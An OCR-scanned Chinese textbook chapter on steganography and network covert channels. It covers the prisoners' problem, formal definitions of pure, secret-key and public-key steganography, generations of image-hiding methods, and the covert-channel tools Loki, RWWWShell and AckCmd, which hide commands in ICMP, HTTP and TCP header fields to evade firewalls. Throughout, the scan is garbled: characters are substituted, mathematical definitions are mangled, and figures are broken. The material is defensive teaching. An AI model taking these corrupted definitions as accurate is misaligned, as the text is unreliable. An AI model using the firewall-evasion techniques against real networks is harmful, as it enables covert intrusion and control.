利用 图 像 水 印 技术 可 以 把 电影 的 多 种 语言 配音 和 字幕 蔡 入 到 视频 图 像 中 ,在 保证 图 像 
视觉 质量 不 受 影 响 的 情况 下 节省 了 声音 的 传输 信道 。 与 此 类 似 ,把 电影 分 级 信息 榜 入 到 图 
像 中 ,可 以 实现 画面 放映 的 控制 ,从 而 实现 电影 的 分 级 播放 。 


6. 隐蔽 通信 监测 


在 网 络 上 有 不 少 非法 分 子 利用 隐藏 技术 ,通过 开放 的 网 络 将 不 可 告 人 的 信息 或 计划 发 
送 给 同伙 , 共 谋 非法 活动 ,危及 人 民 和 国家 的 安全 。 通 信 监 测 就 是 采用 隐 写 分 析 技 术 检 测 信 
道中 是 否 有 采用 信息 隐藏 技术 进行 非法 信息 传播 的 数据 。 目 的 是 发 现 含 有 隐藏 信息 的 媒体 
数据 并 将 其 过 滤 掉 ,阻止 非法 活动 。 


4.4 隐秘 通信 技术 


相对 于 数字 水 印 ,隐秘 通信 是 信息 隐藏 技术 的 一 个 完全 不 同 的 应 用 领域 ,也 不 同 于 信息 
加 密 。 隐 秘 通信 的 目的 不 是 掩盖 通信 信息 的 可 读 性 ,而 是 掩盖 通信 信道 本 身 的 存在 性 。 从 
这 个 意义 上 来 说 ,一 旦 这 种 秘密 的 通信 过 程 被 识破 ,隐秘 通信 也 就 完全 失败 。 本 节 主 要 介绍 
隐秘 通信 的 基本 原理 和 常用 的 手段 。 


441 基本 原理 
1. 隐秘 通信 系统 模型 


Simmons 在 1984 年 针对 隐秘 通信 提出 了 第 一 个 信息 隐藏 的 场景 描述 一 一 囚犯 问 
题 ”。 假 定 Alice 和 Bob 是 分 别处 在 不 同 牢 房 的 囚犯 ,为 了 合谋 一 次 越狱 行动 ,相互 间 需 要 
进行 隐秘 通信 ,而 他 们 的 每 一 次 通信 都 必须 经 过 看 守 人 Wendy 的 监督 。 为 了 使 通信 不 被 怀 
疑 ,Alice 和 Bob 不 能 采用 常规 的 密码 通信 技术 ,因为 一 封 经 过 加 密 后 语义 混乱 的 密 信和 虽然 
可 能 不 会 泄露 越狱 计划 ,但 已 经 足以 作为 两 个 犯人 图 谋 不 轨 的 证 据 了 。 因 此 在 “囚犯 问题 ” 
中 ,Alice 和 Bob 不 仅 要 保证 密 信 不 可 破解 ,而 且 要 隐藏 秘密 通信 的 事实 ,事例 如 图 4. 1 
所 示 。 

简单 的 “囚犯 问题 ”场景 描述 难以 适用 目前 绝 大 多 数 的 隐秘 通信 和 与 数字 水 印 技术 ,需要 
构造 一 个 完整 的 隐秘 通信 与 攻击 (检测 ) 的 理论 模型 。 目 前 ,大 多 数 隐 秘 通 信 技 术 的 应 用 都 
可 以 归纳 为 如 图 4. 2 所 示 的 一 般 模型 。 

其 中 ,原始 数据 是 指 没 有 嵌入 秘密 信息 的 数据 。 它 是 秘密 信息 的 载体 数据 ,也 称 掩 饰 数 
据 (cover) 。 秘 密 信息 是 指 即 将 嵌入 到 原始 数据 中 的 真正 要 传输 的 信息 。 岩 和 人 密 钥 是 把 秘 
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图 4.1 信息 隐藏 模型 一 一 “囚犯 问题 ” 


密 钥 生 产 与 分 配 
嵌入 密 钥 提取 密 负 
原始 数据 搞 密 数据 1 


“| 嵌入 过 程 | 提取 过 程 


秘密 信 让 隐匿 攻 | + 秘密 信息 


图 4.2 隐 写 技术 系统 模型 


密 信息 嵌入 到 原始 数据 的 运算 中 所 使 用 的 密 钥 。 嵌 入 过 程 是 把 秘密 信息 在 嵌入 密 钥 的 作用 
下 瞬 入 到 原始 数据 中 的 过 程 。 携 密 数 据 是 指 在 原始 数据 中 嵌入 了 秘密 信息 之 后 的 数据 , 它 
是 实际 被 传输 的 看 似 无 害 的 消息 ,也 称 隐匿 数据 。 提 取 密 钥 是 把 秘密 信息 从 携 密 数 据 中 提 
取出 来 的 过 程 中 所 使 用 的 密 钥 。 提 取 过 程 是 把 接受 到 的 数据 在 提取 密 钥 的 作用 下 析出 秘密 
信息 的 过 程 。 隐匿 攻击 是 指 试图 发 现 秘密 信息 进而 对 其 破译 的 操作 或 运算 。 隐 匿 攻 击 可 分 
为 主动 攻击 和 被 动 攻 击 。 

实际 中 ,并非 任 何 数据 都 可 以 用 作 载 体 数据 。 因 为 要 求 由 于 嵌入 操作 所 造成 的 载体 数 
据 的 任何 变动 对 于 那些 通信 参与 者 之 外 的 人 都 是 难以 觉察 的 ,所 以 选择 的 载体 数据 应 该 具 
有 足够 多 的 元 余 ,以 便 将 秘密 消息 与 其 置换 而 达到 嵌入 的 目的 。 一 个 载体 数据 在 同一 次 通 
信 中 是 不 能 重复 使 用 的 。 如 果 一 个 攻击 者 两 次 截获 隐匿 数据 % 和 * ,这 两 个 隐匿 数据 是 由 
同一 载体 数据 嵌入 不 同 秘密 所 生成 的 ,那么 根据 隐匿 数据 与 载体 数据 感官 上 无 差别 的 要 求 ， 
攻击 者 就 可 以 通过 分 析 s; 和 ss 的 不 同 之 处 ,从 而 很 容易 检测 出 其 中 是 否 隐 藏 有 秘密 信息 m> 
甚至 重 构 m。 所 以 ,为 避免 同一 载体 数据 在 同一 次 信息 传递 中 的 重复 使 用 ,通信 双方 在 通信 
结束 后 就 需要 毁坏 他 们 已 经 使 用 过 的 所 有 载体 数据 。 


2. 隐秘 通信 系统 分 类 


通常 , 称 不 需要 在 隐匿 通信 之 前 进行 秘密 信息 交换 (如 秘密 密 钥 交换 ) 的 隐匿 技术 系统 
为 一 个 纯 隐 匿 技术 系统 (Pure-Steganography System) 。 

纯 隐 匿 技 术 (Pure-Steganography) : 在 四 元 组 态 =(C,M,E,D) 中 ,C 是 所 有 可 能 的 载 
体 数据 的 集合 ,M 是 秘密 信息 的 集合 ,并 且 有 |1C| 二 |M| ,映射 下:CXM-~~C 是 嵌入 编码 方 
程 (Embedding Function) ,D:C->~>M 是 相应 的 提取 方程 (Extraction Function) ,如 果 对 任意 
mEM,cEC 都 有 DC(E(c.m)) 二 mm, 那么 四 元 组 昌 =(C,M.E,D) 就 称 为 一 个 纯 隐 写 技术 
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纯 隐 写 技术 中 ,不 需要 其 他 任何 信息 来 开始 协议 的 执行 ( 除 正 和 外 ) ,这样 整个 系统 
的 安全 性 就 完全 依赖 于 系统 本 身 。 因 此 合理 适用 的 载体 数据 选取 尤为 重要 。 在 大 多 数 实际 
应 用 的 隐 写 系统 中 ,集合 C 由 那些 有 意义 的 ,但 是 显然 不 构成 危害 的 信息 所 组 成 。 为 避免 
攻击 者 获得 秘密 通信 中 所 使 用 的 载体 数据 ,还 没 使 用 过 的 载体 数据 是 不 能 被 公开 的 。 即 发 
送 方 的 所 有 载体 数据 必须 保密 。 任 意 一 次 通信 中 的 载体 数据 都 是 随机 选取 的 ,最 好 的 方式 
是 发 送 方 在 一 个 适用 的 载体 数据 集合 中 选取 一 个 通过 艇 入 操作 后 发 生 最 小 变化 的 载体 数 
据 。 另 外 ,在 纯 隐 写 技术 系统 中 ,要 求 发 送 者 和 接受 者 都 知道 所 使 用 的 嵌入 和 提取 算法 ,但 
算法 不 能 公开 ,这 样 就 违背 了 Kerckhofs 准则 ,所 以 在 实际 中 它 将 是 不 可 行 且 不 安全 的 。 因 
此 ,必须 假设 监视 者 Wenden 知道 Alice 和 Bob 在 信息 传递 过 程 中 所 使 用 的 算法 。 也 就 是 
Wenden 能 够 提取 Alice 和 Bob 之 间 传 递 的 载体 数据 中 所 隐藏 的 秘密 信息 (如 果 存 在 的 话 ) 。 
这 样 ,系统 的 安全 性 就 需要 依赖 于 一 些 通信 双方 提前 交换 的 秘密 信息 , 称 该 秘密 信息 为 隐匿 
密 钥 (Stego-Key) ,任何 不 知道 这 个 隐匿 密 钥 的 人 都 不 能 提取 隐匿 数据 中 的 秘密 信息 。 从 而 
就 有 了 密 钥 隐 写 技术 。 

私 钥 隐 写 技术 系统 (Secret-Key-Steganography System): 在 五 元 组 H==(C,M,K ,Ekx， 
Dx) 中 ,C 是 所 有 可 能 载体 的 集合 ,M 是 秘密 信息 的 集合 ,并 且 有 |1C| 二 1M|,K 是 私 钥 的 集 
合 , 如 果 映 射 Ek: CXMXK-~C 和 Dk:CXK>M 对 所 有 的 mEM,cEC 和 kEK 都 有 
Dk (Ek (cymsk),k) 二 m 成 立 , 那 么 电 二 (C,M,K .Exk ,Dr) 就 是 一 个 秘密 钥 隐 写 系统 。 

私 钥 隐 写 技术 类 似 于 对 称 密 钥 密 码 算法 。 发 送 方 选择 合适 的 载体 数据 。 并 应 用 密 钥 
KK 将 秘密 信息 嵌入 C 中 。 接 受 方 也 拥有 嵌入 操作 中 所 应 用 的 密 钥 氏 , 则 他 可 以 提取 得 到 秘 
密 消 息 。 任 何不 知道 密 钥 K 的 人 都 不 能 察觉 到 秘密 信息 的 存在 ,更 不 能 提取 出 秘密 信息 。 

一 些 秘密 钥 隐 写 算法 还 要 求 在 解码 时 有 载体 数据 (或 可 从 携 密 数据 处 得 到 载体 数据 的 
信息 ) 的 参与 ,这 样 的 系统 就 具有 很 大 的 局 限 性 。 

公 钥 隐 写 技术 系统 (Public-Key-Steganography System) :在 六 元 组 H==(C,M,K.,,K,， 
E,D) 中 ,C 是 所 有 可 能 载体 的 集合 ,M 是 秘密 信息 的 集合 ,并 且 有 1C| 二 |M|I ,K. 是 私 钥 的 
集合 ,Ks 是 公 钥 的 集合 。 如 果 映 射 Ek :CXMXK,>C 和 Dxk:CXKs>M 对 所 有 的 mE€M， 
cEC 和 eEK,d€E Kia, 都 有 Dk(Ek(cwmsd),e) 二 m 成立, 那么 有 H=(C,M,K,,Ka,E,D) 就 
是 一 个 公 钥 隐 写 系统 。 

公 钥 隐 写 技术 就 像 公 钥 密码 学 一 样 ,不 依赖 于 私 钥 交 换 , 公 钥 隐 写 技术 需要 有 两 个 密 钥 
分 别 作为 私 钥 和 公 钥 。 公 和 钥 DD 存放 在 公开 数据 库 中 ,并 且 作为 秘密 信息 嵌入 过 程 的 隐匿 密 
钥 玉 。 私 钥 下 用 来 重 构 秘 密 信息 。 因 此 ,可 以 应 用 公 钥 密码 体制 的 知识 设计 公 钥 隐 写 体 
制 。 假 设 Alice 和 Bob 在 入 狱 前 就 交换 了 一 些 公 钥 ,并 且 为 了 更 加 安全 ,可 以 将 秘密 信息 经 
过 公 钥 D 加 密 后 的 密 文 宜 入 到 载体 数据 中 。 这 种 将 加 密 和 隐 写 相 结 合 ,使 得 攻击 者 就 算 检 
测 到 载体 数据 中 进行 了 艇 入 操作 也 只 能 得 到 一 串 随机 比特 (秘密 信息 的 密 文 ) 而 不 能 确定 是 
否 是 在 传递 秘密 信息 ,这 样 也 就 增强 了 系统 的 安全 性 ,显然 比 直接 嵌入 明文 更 加 安全 。 


442 隐秘 通信 研究 现状 


隐秘 通信 技术 是 将 特定 信息 隐藏 于 某 种 合法 数据 文件 之 中 ,通过 传递 合法 数据 文件 达 
到 建立 秘密 信道 和 传输 秘密 信息 的 目的 ,其 典型 应 用 有 以 下 三 种 。 
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Qa 将 秘密 信息 隐藏 于 网 络 通信 协议 中 。 

@ 将 秘密 信息 隐藏 于 数字 签名 等 密码 协议 中 。 

@ 将 秘密 信息 隐藏 于 数字 图 像 中 。 

第 一 种 利用 通信 协议 的 一 些 自 定 义 字段 传输 秘密 信息 。 它 主要 用 于 传输 木马 ,特点 是 
隐藏 信息 量 小 ,秘密 信息 和 载体 数据 包 的 结合 不 是 很 紧密 ,容易 被 沉 和 破坏 。 第 二 种 也 称 为 
阔 下 信道 传输 技术 。 它 利用 数字 签名 的 样本 和 签名 并 非 一 对 一 关系 ,使 用 一 定数 学 模型 建 
立 隐 秘 通 信 信 道 , 特 点 是 隐藏 信息 量 小 ,秘密 信息 和 载体 数据 结合 紧密 ,难以 被 发 觉 和 破坏 。 
由 于 涉及 到 复杂 的 密码 学 知识 ,本 书 不 作 详细 介绍 。 第 三 种 利用 图 像 或 音频 数据 对 人 类 感 
官 系统 的 宛 余 , 它 将 是 我 们 介绍 的 重点 。 

一 幅 图 像 c 就 是 一 个 离散 函数 c(z,y) , 它 给 每 个 像素 (z,y) 赋 一 个 颜色 向 量 。 对 于 256 
色 灰 度 图 像 而 言 是 一 维 向 量 , 对 于 24 位 真 彩色 则 是 三 维 向 量 。 由 于 人 类 视觉 对 光 的 敏感 程 
度 是 非 线性 (指数 ) 变 化 的 ,即使 在 最 亮 的 时 候 ,16 个 等 级 的 灰 差 值 一 般 也 不 会 产生 视觉 上 
的 差异 。 因 此 ,在 数字 图 像 信 息 隐 藏 中 ,不 管 使 用 什么 方法 ,如 果 蔡 换 像素 与 原始 像素 的 差 
距 在 16 个 灰 度 级 之 内 , 则 该 图 像 的 差异 在 视觉 上 是 不 可 察觉 的 ,这 就 是 图 像 信 息 隐 藏 的 人 
体 生 理学 基础 。 

近 几 年 来 ,信息 隐藏 技术 发 展 很 快 , 从 早期 的 基于 文件 结构 隐藏 .空域 LSB 隐藏 算法 发 
展 到 基于 DCT(Discrete Cosine Transform ,离散 余弦 变换 ) 等 频 域 系统 的 隐藏 ,一 方面 , 技 
术 越 来 越 复杂 ,隐藏 信息 的 隐蔽 性 越 来 越 好 ; 另 一 方面 ,隐蔽 性 的 增强 不 可 避免 地 以 牺牲 隐 
藏 容量 为 代价 。 现 有 的 信息 隐藏 系统 已 不 再 是 单纯 的 将 信息 隐藏 在 载体 中 实现 隐秘 通信 ， 
而 是 要 求 具有 更 高 的 安全 性 、 稳 健 性 和 嵌入 容量 ,还 应 具有 较 强 的 不 可 感知 性 , 既 包括 人 类 
视觉 的 不 可 感知 ,还 包括 在 信息 嵌入 的 统计 量 上 具有 不 可 感知 性 。 对 于 不 同类 型 的 载体 和 
嵌入 信息 ,这 种 不 可 感知 性 是 不 相同 的 。 现 阶段 的 信息 隐藏 技术 发 展 可 以 分 为 四 代 。 

(1) 第 一 代 基 于 图 像 文件 结构 的 信息 隐藏 技术 

在 图 像 文件 结构 的 非 解析 部 分 隐藏 无 限制 量 的 信息 。 它 的 不 可 感知 性 仅 限于 通过 图 像 
解析 软件 进行 观察 的 人 类 视觉 系统 。 其 隐藏 容量 最 大 ,但 不 可 感知 性 和 稳健 性 都 最 差 。 这 
种 低 技术 的 隐藏 已 经 基本 被 淘汰 。 

(2) 第 二 代 基 于 固定 模式 的 信息 隐藏 技术 

在 时 空域 主要 采用 了 连续 、 随 机 的 LSB 艇 入 算法 ,通常 引入 加 密 机 制 提高 信息 隐藏 的 
安全 性 。 由 于 变换 域 的 信息 隐藏 可 以 提高 信息 嵌入 的 不 可 见 性 和 稳健 性 ,也 在 离散 傅 里 叶 
变换 ,离散 余弦 变换 .离散 小 波 变换 等 变换 域 中 隐藏 信息 。 其 隐藏 容量 受到 一 定 限 制 , 不 可 
感知 性 有 所 提高 ,其 中 变换 域 信息 隐藏 的 稳健 性 好 于 空域 隐藏 算法 。 它 属于 目前 的 主流 隐 
藏 技术 。 

(3) 第 三 代 基 于 可 感知 模型 的 信息 隐藏 

通常 考虑 如 何 对 由 于 信息 嵌入 引起 的 图 像 降 质 进行 修正 ,使 载体 在 嵌入 信息 后 具有 较 
高 的 不 可 察觉 性 ,但 是 没有 修正 由 于 信息 嵌入 带 来 的 统计 偏差 。 因 此 基于 可 感知 模型 的 信 
息 隐 藏 中 的 统计 偏差 是 实现 检测 的 重要 依据 。 其 隐藏 容量 受到 了 很 大 的 限制 ,而 不 可 感知 
性 和 稳健 性 大 大 提高 。 

(4) 第 四 代 基 于 视觉 处 理 和 统计 保持 的 信息 隐藏 

不 仅 通过 视觉 处 理 使 隐秘 载体 中 的 嵌入 信息 具有 较 高 的 不 可 察觉 性 ,还 采用 多 种 手段 
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对 统计 属性 进行 修正 ,从 而 无 法 从 对 载体 的 简单 统计 量 分 析 来 检测 到 隐藏 信息 。 在 数字 图 
像 作 为 信息 隐藏 载体 时 ,通常 采用 直方 图 修正 的 方法 进行 统计 保持 。 但 是 这 只 能 对 于 图 像 
直方 图 等 一 阶 统计 量 进行 保持 。 其 隐藏 容量 受到 的 限制 极 大 ,而 不 可 感知 性 和 稳健 性 也 
最 高 。 

信息 隐藏 技术 不 断 推陈出新 ,新 的 隐藏 算法 和 工具 不 断 涌现 。LSB 隐藏 方法 是 最 简单 
的 隐 写 术 算法 ,可 以 在 图 像 的 时 空域 LSB 中 连续 、 分 散 的 嵌入 信息 ,也 可 在 变换 域 系数 的 
LSB 中 嵌入 信息 。Ezstego 是 一 种 采用 连续 时 空域 LSB 方法 的 隐藏 工具 ,该 工具 通过 对 调 
色 板 排序 减少 由 于 信息 嵌入 引起 的 图 像 降 质 。Steganos 也 是 在 时 空域 的 连续 做 人 方法 。 
S-Tools 采用 时 空域 的 分 散 嵌 人 方法 。Jsteg .JP Hide、Outguess、F5 等 是 在 JPEG 图 像 中 利 
用 DCT 量化 系数 能 和 信息 的 工具 。 基 于 小 波 分 析 方 法 的 隐藏 技术 也 有 提出 。BPCS 算法 
是 改进 的 LSB 嵌入 方法 ,采用 了 分 块 嵌 入 方法 ,在 


容 域 隐藏 + 统计 补偿 约 
信息 嵌入 前 ,需要 选择 适合 的 嵌入 数据 块 。 为 了 增 攻 on 志 
加 信息 隐藏 的 稳健 性 ,很 多 隐藏 算法 和 工具 也 采用 当 | | 空域 SB 史 基 或 调 色 梳 鸣 蕊 | 汉 
扩 频 通信 技术 。 还 有 许多 隐藏 方法 和 工具 利用 了 大 强 


变换 域 的 中 频 系数 进行 信息 的 隐藏 。 几 类 隐 写 方 图 4.3 几 类 隐 写 方法 的 比较 
法 的 比较 如 图 4. 3 所 示 。 


443 基于 网 络 协议 的 隐秘 通信 
1. 网 络 隐秘 通信 原理 


只 要 能 有 效 混淆 秘密 数据 和 正常 网 络 数据 的 区 别 ,都 可 以 形成 一 条 有 效 的 秘密 信道 。 
因为 基于 网 络 协议 的 隐秘 通信 技术 简便 易 行 ,所 以 最 常 为 木马 程序 和 黑客 所 使 用 。 最 常见 
的 秘密 信道 是 基于 隧道 技术 的 。 如 HTTP 协议 中 的 隧道 技术 ,SSH 协议 中 提供 的 TCP 数 
据 隧 道 。 攻 击 者 为 骗 过 网 络 管理 员 和 防火 墙 程序 ,经 常 使 用 各 种 协议 建立 与 控制 目标 的 通 
信和 联系 。 

ICMP(Internet Control Message Protocol,Internet 控制 消息 协议 ) 报 文 是 网 络 中 最 常 
见 的 通信 报 文 之 一 。PING 作为 测试 主机 连通 性 的 工具 在 网 络 中 应 用 广泛 。 所 以 使 用 回 送 
请 求 和 应 答 报 文 建立 秘密 信道 就 成 了 很 自然 的 事情 。 图 4. 4 显示 了 这 两 种 报 文 的 格式 。 根 
据 RFC 规范 约定 ,ICMP 报 文中 的 标识 符 和 序号 字段 由 发 送 端 自 由 选择 。 它 们 在 应 答 中 应 
该 回 显 ,以 便 发 送 端 将 应 答 和 请 求 相 匹配 。 另 外 ,可 选 数据 ?字段 内 容 也 必须 回 显 。 . 
此 ,标识 符 、 序 号 和 可 选 数据 字段 都 能 用 于 隐秘 通信 。 由 于 防火 墙 \ 入 侵 检测 等 安全 应 
通常 只 检查 ICMP 报 文 首部 ,因此 用 ia 
据 字段 中 。 


类 型 (0 或 8) 代码 (0) 校 验 和 
标识 符 序号 
可 选 数据 


4. 4 ICMP 回 送 请 求 和 应 答 报 文 格式 
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类 似 的 做 法 还 有 使 用 HTTP、DNS 等 协议 建立 秘密 信道 。 它 们 都 可 以 实现 客户 端 和 服 
务 器 端的 准 实时 通信 ,这 是 其 他 隐秘 通信 技术 所 欠缺 的 。 

通过 隧道 技术 建立 的 秘密 信道 效率 很 高 ,但 只 是 简单 地 将 秘密 信息 放 到 另 一 种 报 文中 ， 
实际 使 用 时 还 必须 配合 加 密 技术 来 提高 传输 安全 性 ,否则 很 容易 被 破坏 。 另 一 种 建立 秘密 
信道 的 方法 是 将 秘密 信息 嵌入 协议 报 文 的 一 些 不 影响 接收 效果 的 未 用 字段 和 发 送 端 自 定义 
字段 中 。 比 如 TCP 和 IP 协议 中 就 有 很 多 这 类 字段 可 供 利 用 ,特别 适合 于 建立 秘密 信道 。 
这 两 种 数据 包 的 格式 分 别 如 图 4. 5 和 图 4. 6 所 示 。 


4 8 16 32 
版 本 | 包头 长 度 服务 类 型 总 长 度 
标识 符 标记 碎片 偏 移 
生存 期 协议 包头 校 验 
源 地 址 
目的 地 址 
选项 十 填充 
数据 


4.5 JIP 数 据 包 格式 


16 32 
源 端口 目的 端口 

序列 号 

已 接受 到 的 包 序 号 
偏 移 保留 标志 位 窗口 

校 验 和 紧急 指针 

选项 十 填充 

数据 


图 4.6 TCP 数据 包 格 式 


在 包 中 ,如 IP 包 “标志 符 ” 和 TCP“ 序列 号 ”“ 已 接受 到 的 包 序 号 ” “窗口 ”“ 保 留 ” 字 
段 , 以 及 两 个 协议 的 “选项 十 填充 ”字段 都 可 以 用 于 隐秘 通信 。 

如 果 使 用 IP 包 “ 标 志 符 ”或 “选项 十 填充 ”等 字段 来 携带 秘密 信息 ,可 以 直接 将 数据 放 入 
字段 中 ,每 个 IP 包 可 以 携带 一 二 个 字 节 的 秘密 信息 。 如 果 使 用 TCP* 序 列 号 ”就 稍微 复杂 
些 ,必须 修改 建立 连接 的 三 次 握手 过 程 。 客 户 端 将 第 一 次 握手 的 SYN 包 内 携带 的 序列 号 
用 秘密 信息 的 头 四 个 字 节 代替 ,发送 这 个 SYN 包 只 是 为 了 传输 隐秘 通信 数据 ,并 非 为 了 建 
立 连接 。 服 务 器 端 只 需要 返回 一 个 RESET 使 连接 无 法 建立 即 可 。 重 复 此 过 程 ,客户 端 和 
服务 器 端 就 可 以 通过 这 种 方式 一 直 持续 通信 下 去 。 

基于 报 文 伪装 技术 的 隐秘 信道 以 效率 的 损失 换取 了 更 高 的 安全 性 。 


2. 网 络 隐秘 通信 工具 
下 面 介绍 的 几 个 工具 大 都 由 客户 端 和 服务 器 端 两 个 部 分 构成 ,两 部 分 通过 秘密 信道 完 
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成 通信 。 了 人 解 它们 有 助 于 更 好 地 维护 网 络 的 安全 ,而 且 从 这 些 工具 中 我 们 也 可 以 看 到 基于 
网 络 协议 的 秘密 信道 进化 的 历程 。 

(1) Loki 一 一 基于 ICMP 的 秘密 信道 

采用 基于 ICMP 隧道 技术 建立 秘密 通道 的 工具 很 多 ,应 用 最 广泛 的 是 Loki。 一 般 认为 
Loki 也 是 最 早 的 秘密 信道 工具 ,1996 年 8 月 ,Damon9 的 开发 人 员 提 出 了 通过 ICMP 建立 
秘密 信道 的 思路 :“ 许 多 防火 墙 和 网 络 都 不 加 阻拦 地 允许 ping, 那 么 我 们 可 以 考虑 使 用 ping 
在 这 类 网 络 中 建立 秘密 信道 ……”。 

Loki 用 于 各 种 类 UNIX 操作 系统 ,包括 Linux、FreeBSD、OpenBSD 和 Solaris 系统 。 
Loki 将 所 要 携带 的 秘密 信息 放 在 ICMP 的 数据 域 (Data Field) 中 ,客户 端 请 求 和 服务 器 端 
响应 分 别 使 用 ICMP type 0(Echo Reply) 和 ICMP type 8(Echo Request) (数据 包 格 式 如 
图 4.4 所 示 )。 由 于 在 这 两 种 报 文 中 数据 段 是 可 选 的 (有 时 被 用 来 放 校 验 和 或 者 时 间 信 息 )， 
所 以 很 少 会 被 检查 。 

对 于 网 络 而 言 , 通 过 不 断 的 ping .ping-response 过 程 来 传输 一 系列 的 ICMP 数据 包 。 
对 于 攻击 者 来 说 ,在 客户 端 输 入 命令 ,可 以 在 服务 器 端 执行 ,这 样 就 建立 一 个 非常 高 效 的 秘 
密会 话 通道 。 而 且 ICMP 协议 不 涉及 到 端口 的 概念 ,如 果 系 统管 理 员 用 “netstat-an” 命 令 来 
显示 正在 侦 听 TCP 和 UDP 端口 的 进程 ,或 者 使 用 诸如 Nmap 之 类 的 工具 搜索 端口 以 查找 
后 门 程序 ,无 法 发 现 Loki 的 存在 。 

Loki 也 可 以 在 UDP53 端口 上 运行 ,并 将 数据 包 伪 装 成 DNS 的 查询 和 响应 信息 。 在 客 
户 端 命令 行 输入 NSWAPT 参数 ,Loki 会 支持 ON-THE-FLY 协议 交换 ,并 将 ICMP 绑 定 在 
UDP 的 53 端口 上 。 但 是 在 此 模式 工作 下 ,Loki 可 以 被 端口 扫描 程序 检测 到 。 另 外 ,为 了 
建立 更 隐秘 的 连接 ,Loki 还 支持 用 Blowfish 算法 对 通信 信息 加 密 。 

Loki 工具 中 蕴涵 的 思想 对 攻击 工具 的 发 展 产 生 了 深刻 的 影响 ,还 有 一 些 工具 也 是 基于 
ICMP 建立 秘密 信道 的 ,如 CodeZer、 软 件 开发 组 的 ICMP Backdoor、Bo2k 的 ICMP 插件 和 
Soft Project 的 007Shell 等 。 

(2) RWWWShell 一 一 基于 HTTP 的 秘密 信道 

如 果 目 标 网 络 上 禁止 ICMP 报 文 的 传输 ,可 以 更 隐蔽 地 使 用 HTTP 携带 命令 。 大 多 数 
网 络 都 提供 WWW 服务 ,RWWWShell 基于 HTTP 建立 秘密 信道 。RWWWShell 是 由 
THC's van Hauser 用 Perl 开发 的 ,最 初版 本 1.6 发 布 于 1998 年 10 月 ,具有 很 强 的 可 移 
植 性 。 

RWWWShell 是 最 早 使 用 “逆向 连接 ?技术 的 Shell, 默 认 情况 下 ,每 隔 60s 服务 器 就 试 
图 访问 外 面 的 主 系统 一 次 ,查询 需要 执行 的 命令 。 如 果 攻 击 者 在 主 系统 输入 了 一 条 命令 ,这 
个 命令 就 会 被 服务 器 取 回 并 执行 。 接 下 来 的 通信 就 会 携带 这 条 命令 的 执行 结果 和 下 一 条 命 
令 的 请 求 。 

“逆向 连接 ?是 服务 器 到 主 系统 取 回 命令 并 执行 ,然后 将 结果 送 回 。 这 样 所 有 的 连接 是 
从 内 部 系统 发 起 的 ,从 网 络 访问 方式 看 ,内 部 被 利用 的 计算 机 好 像 是 一 个 浏览 器 ,而 外 部 的 
主 系统 好 像 是 一 个 Web 服务 器 。 所 有 输出 信息 都 会 从 一 个 高 于 1024 的 源 端口 送 到 TCP 
的 80 端口 ,所 有 的 响应 信息 都 由 TCP 的 端口 返回 到 源 端口 。 这 种 数据 包 具 有 HTTP 的 特 
点 。 更 严重 的 是 ,这 种 Shell 数据 采用 的 是 HTTP GET 命令 所 用 的 格式 。 因 此 ,即使 是 防 
火 墙 , 也 不 会 对 其 产生 怀疑 。 防 火 墙 和 其 他 网 络 组 件 会 将 这 种 数据 看 作 是 HTTP 信息 。 而 
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这 种 信息 是 大 多 数 网 络 允许 的 。 实 际 上 ,秘密 通道 允许 Shell 命令 访问 ,也 就 为 攻击 者 在 内 
部 系统 上 执行 命令 提供 了 便利 。 

从 攻击 者 的 观点 来 看 。 使 用 RWWWShell 令 人 烦恼 。 要 缓慢 地 输入 命令 ,等 待 服务 器 
收 到 并 执行 命令 ,然后 再 送 回 结果 ,这 些 都 令 人 烦躁 和 灰心 。 攻 击 者 每 输入 一 条 命令 ,就 要 
等 待 60s, 然 后 才能 得 到 响应 。60s 的 时 间 可 以 缩短 ,可 是 如 果 时 间 间 隔 太 短 ,又 会 引起 服务 
器 的 怀疑 。 如 果 你 每 3s 就 浏览 一 次 网 页 ,那么 肯定 是 不 正常 的 。 当 然 , 攻 击 者 可 以 随机 地 
设 定 访问 Web 服务 器 的 间隔 以 增加 RWWWShell 的 隐秘 性 。 

如 果 防 火 墙 需要 静态 密码 验证 进行 HTTP 认证 ,攻击 者 是 不 安全 的 。 许 多 组 织 只 人 允许 
那些 通过 了 Web 代理 用 户 ID 和 密码 认证 的 用 户 访问 Web 服务 器 。RWWWShell 允许 攻 
击 者 通过 编程 来 绕 过 Web 服务 器 的 代理 防火 墙 的 认证 限制 。 

由 于 RWWWShell 是 用 Perl 来 编写 的 ,所 以 改写 RWWWShell 很 容易 ,有 人 已 经 开发 
出 了 功能 类 似 , 具 有 HTTPS 协议 支持 的 工具 。 另 外 ,Internet Relay Chat 频道 上 曾经 发 布 
过 关于 建立 Bo2k RWWWShell 插件 的 文章 ,但 至 今 还 没有 看 到 类 似 工具 的 出 现 。 

(3) AckCmd 一 一 基于 TCP/IP 头 的 秘密 信道 

基于 TCP/IP 头 的 秘密 信道 有 出 色 的 隐藏 性 ,很 受 攻击 者 青睐 ,如 Linux 平台 上 由 
Craig H. Rowland 编写 的 Converte TCP 就 十 分 流行 。 运 行 在 Windows 2000 平台 上 的 
AckCmd 比 Converte TCP 更 隐秘 。 

由 Arne Vidstrom 编写 的 AckCmd 针对 防火 墙 和 入 侵 检测 系统 的 弱点 作 了 以 下 改进 ， 

尽管 AckCmd 也 使 用 TCP/IP 报 文 头 建立 秘密 信道 ,但 是 它 使 用 ACK 包 而 不 是 SYN 
包 携带 秘密 信息 。 客 户 端 直接 发 送 能 入 了 秘密 信息 的 ACK 包 , 服 务 器 接着 返回 RESET 
包 。ACK 包 是 正常 三 次 握手 过 程 中 的 第 二 个 包 , 使 得 这 种 通信 方式 看 起 来 不 像 是 客户 端 在 
给 服务 器 发 送 请 求 , 倒 好 像 是 客户 端 给 服务 端 已 经 发 出 的 连接 请 求 的 回应 ,这 会 导致 防火 墙 
的 误 判 。 而 防火 墙 对 从 内 网 到 Internet 的 包 的 限制 往往 相对 宽松 ,这 样 就 悄 无 声息 地 建立 
了 跨越 防火 墙 的 秘密 信道 。 

AckCmd 客户 端 选用 的 TCP 端口 是 80 ,服务 端 选用 的 是 TCP 1054。 客 户 端的 端口 和 
WWW 服务 器 的 默认 端口 相同 ,使 得 AckCmd 的 秘密 通信 对 防火 墙 更 具有 迷惑 性 ,从 而 降 
低 了 秘密 通信 流量 被 发 现 的 风险 。 

不 过 ,AckCmd 只 是 简单 地 将 数据 放 到 ACK 包 内 ,并 不 提供 加 密 机 制 , 可 以 在 Sniffer 
